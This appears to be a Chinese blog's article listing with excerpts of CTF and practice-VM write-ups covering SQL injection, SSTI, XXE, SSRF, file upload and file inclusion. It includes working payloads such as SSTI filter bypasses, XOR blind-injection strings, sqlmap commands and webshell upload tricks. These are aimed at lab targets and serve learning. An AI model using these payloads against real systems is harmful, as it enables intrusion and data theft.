- 博客(277)
- 收藏
- 关注
RSS订阅原创 攻防世界-web2
分析下来其实就是知道加密后的结果:a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws。要求未加密的数据(直接一步步解不好出结果,base64解密结果好像不好输出,直接写代码一步到位)ord():返回字符串中第一个字符的 ASCII 值。chr():从指定 ASCII 值返回字符。substr():返回字符串的一部分。strrev():反转字符串。直接按照它的代码反着解。
2022-10-10 20:18:10
381
原创 攻防世界-easyupload
上传php文件不行, 修改Content-Type: image/jpeg也不行,把文件名改成jpg才可以,还有头文件也有验证,也要改(这里直接上传正常的jpg文件比较好)然后可以上传成功,但是试过文件名的各种绕过形式,都不能把php上传,就算上传了也不能在蚁剑上读取。这个系统是windows,用user.ini试试(user.ini:把文件当作php文件解析)(index.php是uploads下的php文件,用它读取5.jpg下的文件)然后输入木马,这里尝试过后php也是被过滤的,用缩减版。
2022-10-10 16:43:56
2685
3
原创 攻防世界-inget
看到说id,可能id是参数,尝试了几个数,页面都没有变化,也没有延时回显。看了wp,确实是sql注入,注入点是id,用sqlmap扫就可以出来。源代码里没有东西,御剑之类的也扫不到。
2022-10-06 18:09:54
1178
2
原创 攻防世界-fileclude
要file2满足条件file_get_contents($file2) === "hello ctf"才会执行file1。然后抓包,POST只保留hello ctf(如果直接在HackBar上写hello ctf,bp抓不了包,一定要加=)file1是最终要读取flag的,又是文件包含,用php://filter读取。不能让flag2直接等于hello ctf,要让hello ctf先包含进文件。所以可以用file2=php://input,POST写入hello ctf。然后base64解码。
2022-10-05 17:56:12
1129
原创 pikachu-xxe
然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题。但是扫描80端口会快,81会慢,因为80端口开放了。点 response received进行排序。在WWW下保存以test.dtd为名的文件。选择 response received。测试一下是否有xxe漏洞,且是否有回显。把echo $html 注释掉。两个回显都是这样的报错信息。填好数据,然后开始爆破。表示出来,再进行排序。
2022-09-19 21:22:18
213
原创 vulnhub-xxe lab: 1
这里用php://filter而不用 file:// 是因为php://filter可以直接跟相对路径,而 file:// 要跟绝对路径。在192.168.61.145这个页面下,xxe和 admin.php是知道的,但是绝对路径不知道。无法访问,但是robots.txt里面写的应该不会是无效网站,所以可能是被拒绝访问了。继续看代码,可以看到这个,这也是账号密码正确后会进行的东西。emm,看着有点像php,卡了,忘记可以运行代码了。错了,试了几遍都没用,看来要找别的路。目测base32解密。
2022-09-17 21:26:32
406
原创 ctfshow-web477(CMS)
这个网站是用cmseasy搭建的,找一下cmseasy漏洞。网页是这样的,刚好和题目的网站对应上,版本是5.7。要进入管理界面,试一下在url后面输入admin。试用admin admin账号密码登录,成功。这里要在模块里面点编辑模块,这里没有。可能是版本不对 这里要7.3.8。1.试一下任意文件操作。再试一下代码执行漏洞。
2022-09-13 21:22:41
551
原创 Pass-19,20
首先要匹配image/jpeg,image/png,image/gif。保存文件时系统把/.删除,文件就变成php保存。然后后缀要有jpg.png,gif。php/.不等于php,绕过检验。按照上题思路做,文件名拆成数组。直接在php后面加/.
2022-07-17 16:05:25
158
原创 DC-8靶机
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.137 -p- -oN nmap137.A点不同的选项,uid会变猜测有sql注入sqlmap -u "http://192.168.61.137/?nid=1"sqlmap -u "http://192.168.61.137/?nid=1" --dbs数据库:d7db 和 information_schemasqlmap -
2022-07-07 16:22:03
267
原创 DC-7靶机
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.136 -p- -oN nmap136.Anmap -A -T4 192.168.61.136 -p- -oN nmap136.A有22和80端口下面有提示DC7USER百度一下可以下载一个文件这里也说明是重要点下载到kali本地git clone https://github.com/Dc7User/staffdbcd s
2022-07-05 16:28:39
218
原创 DC-5靶机
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.133 -p- -oN nmap133.A(中途IP改成了192.168.61.134)开放了80,111,39542打开显示的IP地址 在concat界面把信息填写,就会跳转页面,是GET传参 反复刷新会发现时间有变化,猜测页面存在文件包含(?)然后用burp爆破页面(御剑扫不出来)一共7个 footer可以看到这个,确认这
2022-07-01 19:07:57
356
原创 DC-4靶机
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24打开显示的IP地址burp爆破用kali的/usr/share/john下的password.lst当字典,burp爆破 暗示我们可以吧命令改成我们想运行的命令,比如反弹shellkali开启监听,获取到信息反弹交互shell尝试进入到home目录,看到三个三件夹,应该是三个用户pwdcd /homels 查看jim,buckups里有old-passwords.bak文件,应该是密码文件把密码保存为文件1
2022-06-30 17:24:25
206
原创 ctfshow-web354(SSRF)
法一:sudo.cc相当于127.0.0.1 法二: 改本地域名的A记录到127.0.0.1上,然后访问http://域名/flag.php 即可(也可在自己域名服务器上搭建302跳转)
2022-06-28 11:12:33
598
原创 ctfshow-web352,353(SSRF)
一定要出现http或者https不能出现localhost和127.0.0.1但是(1)127.1可以被解析成127.0.0.1 (2)在Linux中,也会被解析成是一个环回地址网段,从都表示localhost(4)ip地址还可以通过表示成其他进制的形式访问IP地址进制转换 (520101.com) (这题只有十进制有用)......
2022-06-27 19:13:04
262
原创 buuctf-CV Maker
其他地方点了没有反应,只能点注册和登录,可以先注册一个看看里面的情况,sql注入应该是没有用的同样的,其他的点了没有反应,只能更换头像,应该有上传漏洞上传png文件可以,但是php文件不行,尝试后发现要加头文件传入一句话木马后要自己动手查找路径,不像之前的题一样会自动显示出来路径的格式是这样的,用蚁剑就可以了(不知道是不是操作上有什么问题,蚁剑连不上)http://a27a75dc-4396-4560-82f4-c1ab13a10e72.node4.buuoj.cn:...
2022-05-23 09:32:43
332
1
原创 buuctf-ReadlezPHP(反序列化)
点开后是源代码,要把前面的view-source:删了<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ ...
2022-05-22 11:09:35
354
原创 buuctf-encode_and_encode
得到源代码 <?phperror_reporting(0);if (isset($_GET['source'])) { show_source(__FILE__); exit();}function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):...
2022-05-21 17:45:01
227
原创 buuctf-write_shell(命令执行)
<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
2022-05-21 11:47:13
279
原创 buuctf-Cookie Store
题目提示cookie,抓包后在cookie后看到有点特别的东西,试一下base64(花了一块,本来应该是50的)把49改成100,然后加密填回去再购买flag就可以了
2022-05-18 22:24:15
136
2
原创 buuctf-[GYCTF2020]Ezsqli(异或注入无列名)
尝试过后发现只有1,2可以,3以上会显示错误尝试一下slq注入,但是输入不是1,2的就会显示错误尝试异或注入被过滤了过滤了for,in在information里也被过滤了可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了id=1^(ascii(substr(database(),1,1))=103)^1换成 innodb_table_stats 也没用聊一聊bypass in...
2022-05-18 22:01:10
582
原创 buuctf-Welcome to Earth
把url上的die删掉查看源代码 document.onkeydown = function(event) { event = event || window.event; if (event.keyCode == 27) { event.preventDefault(); window.location = "/chase/"; } else die(); }; ...
2022-05-18 16:51:49
102
原创 buuctf-[CISCN2019 总决赛 Day2 Web1]Easyweb
扫描目录得到*.php.bak尝试*表示的东西, index,flag之类的都没用有image.php,顺便可以看到可能的注入点下载下了备份文件<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);$path=addslashes($path);...
2022-05-18 11:43:11
644
2
原创 buuctf-枯燥的抽奖(php_mt_seed-master工具)
这道题主要是用一下工具查看源代码可以得到$(document).ready(function(){ $("#div1").load("check.php #p1"); $(".close").click(function(){ $("#myAlert").hide(); }); $("#button1").click(function(){ $("#myAlert").hide(); guess..
2022-05-16 11:55:06
543
原创 buuctf-Can you guess it?(代码审计)
random_bites:生成适合加密使用的任意长度的加密随机字节字符串<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)...
2022-05-15 17:08:56
317
原创 buuctf-颜值成绩查询(sql注入)
输入1-4都是可以的,从5开始就不存在了多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists尝试一下异或注入1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1这是正确的结果错误的结果是这样的通过这个可以最终得到flag别人...
2022-05-15 15:03:56
463
原创 buuctf-Kookie
登录要输入admin,要在cookie中输入,这题理解不难,但是容易被自己绕进去url上给出了参数输入的格式,按照格式写进cookie里点Log out! 会回到初始页面,查看源代码也没有flag(这确实时登录进去了,这才是让人绕进去的地方,一直找flag找不到)思路没错,细节错了,找这个数据的数据指的应该只有admin。...
2022-05-14 23:55:28
167
原创 buuctf-PYWebsite
东西很多,能操作的只有BUY IT NOW 和输入授权码这里说要付款,我还真就扫了一下又试了下对授权码输入一些代码,也没用再重新看一遍源代码,才发现有东西,之前只注意了开头和结尾 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById...
2022-05-14 17:21:29
287
原创 buuctf-EasySearch
特意搜了下题目,以为有什么提示,结果是一个搜索插件然后用注入,爆破密码,都没用扫描后台发现index.php.swp备份(我用御剑没扫出来,下次要安装一些其他的扫描工具,用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。)<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0..
2022-05-14 16:50:12
246
原创 buuctf-FinalSQL
说了是sql注入看到页面首先会注入用户名和密码,但是一些字符和关键词如:' union都被过滤了对那些数字入手看看要第六个,可以对id入手过滤了union ,空格,再加上id不能随意输入,随意返回,所以应该是盲注而这里也同样过滤了很多,用布尔盲注,时间盲注都会被过滤用异或注入试试(难度挺高的)先尝试?id=1^0?id=1^(ascii(substr((select(group_concat(schema_name))from(information..
2022-05-11 00:08:50
370
原创 buuctf-Love Math1
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r.
2022-05-07 17:25:34
234
原创 ctfshow-web369(SSTI)
过滤了request,之前的方法都不能用了,直接用终极代码?name={% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(24)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|joi..
2022-05-06 08:41:18
447
原创 ctfshow-web368(SSTI)
用上两题的方法,有东西被过滤了两个大括号被过滤了也不知道是什么意思?name={% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(geti...
2022-05-05 16:07:04
453
原创 ctfshow-web366,367(SSTI)
_ args [ ' 都被过滤了有绕过_的方法,但是因为过滤了[,也过滤了args,所以没法用用attr的话还是会有_,还要加一个和request.args作用相似的东西,request.cookies
2022-05-05 16:06:52
244
原创 ctfshow-web365(SSTI)
这次是把args [ 和' 过滤了有两种方式可以绕过[可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__
2022-05-05 15:01:28
278
原创 ctfshow-web364(SSTI)
用上题的方法,发现还是有东西被过滤了筛选后发现是args过滤了引号和args,上题的姿势不能用了,但是可以用chr()函数绕过。可以用这个payload判断chr()函数的位置:{{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}}用bp跑后发现有这几个,可以任意取取80分析一下别人的wp(现在的水平也只能这样了)?name={%...
2022-04-30 14:50:23
522
原创 ctfshow-web363(SSTI)
过滤了'?name={{[].__class__.__base__.__subclasses__()}}?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}法一:本来应该这样的 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}但是单引号被过滤了引...
2022-04-30 13:33:07
400
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人